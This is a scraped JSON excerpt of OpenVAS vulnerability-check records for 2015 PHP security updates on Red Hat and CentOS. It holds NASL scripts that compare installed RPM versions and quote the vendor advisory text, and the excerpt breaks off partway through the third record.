"reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-07-10T00:00:00", "title": "RedHat Update for php RHSA-2015:1218-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310871388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871388", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php RHSA-2015:1218-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871388\");\n script_version(\"$Revision: 6689 $\");\n script_cve_id(\"CVE-2014-9425\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2015-0232\",\n \"CVE-2015-0273\", \"CVE-2015-2301\", \"CVE-2015-2783\", \"CVE-2015-2787\",\n \"CVE-2015-3307\", \"CVE-2015-3329\", \"CVE-2015-3411\", \"CVE-2015-3412\",\n \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4026\",\n \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4598\", \"CVE-2015-4599\",\n \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\", \"CVE-2015-4603\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:50:06 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-10 06:07:32 +0200 (Fri, 10 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for php RHSA-2015:1218-01\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting\n language commonly used with the Apache HTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n\");\n script_tag(name: \"affected\", value: \"php on Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"RHSA\", value: \"2015:1218-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00005.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.3~46.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:42", "references": ["2015:1218", "http://lists.centos.org/pipermail/centos-announce/2015-July/021237.html"], "pluginID": "1361412562310882219", "description": "Check the version of php", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-07-10T00:00:00", "title": "CentOS Update for php CESA-2015:1218 centos6 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882219", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882219", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2015:1218 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882219\");\n script_version(\"$Revision: 6657 $\");\n script_cve_id(\"CVE-2014-9425\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2015-0232\",\n \"CVE-2015-0273\", \"CVE-2015-2301\", \"CVE-2015-2783\", \"CVE-2015-2787\",\n \"CVE-2015-3307\", \"CVE-2015-3329\", \"CVE-2015-3411\", \"CVE-2015-3412\",\n \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4026\",\n \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4598\", \"CVE-2015-4599\",\n \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\", \"CVE-2015-4603\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-10 06:08:37 +0200 (Fri, 10 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for php CESA-2015:1218 centos6 \");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language\n commonly used with the Apache HTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n\");\n script_tag(name: \"affected\", value: \"php on CentOS 6\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:1218\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-July/021237.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zts\", rpm:\"php-zts~5.3.3~46.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:49:20", "references": ["2015:1135", "http://lists.centos.org/pipermail/centos-announce/2015-June/021191.html"], "pluginID": "1361412562310882203", "description": "Check the version of php", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-24T00:00:00", "title": "CentOS Update for php CESA-2015:1135 centos7 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-0231"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882203", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882203", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2015:1135 centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882203\");\n script_version(\"$Revision: 6657 $\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2014-9652\", \"CVE-2014-9705\", \"CVE-2014-9709\",\n \"CVE-2015-0231\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-2301\",\n \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3307\",\n \"CVE-2015-3329\", \"CVE-2015-3330\", \"CVE-2015-3411\", \"CVE-2015-3412\",\n \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\",\n \"CVE-2015-4026\", \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4598\",\n \"CVE-2015-4599\", \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\",\n \"CVE-2015-4603\", \"CVE-2015-4604\", \"CVE-2015-4605\", \"CVE-2006-7243\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:50:44 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-24 06:15:52 +0200 (Wed, 24 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for php CESA-2015:1135 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language\n commonly used with the Apache HTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library us ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"php on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"CESA\", value: \"2015:1135\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2015-June/021191.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~36.el7_1\", 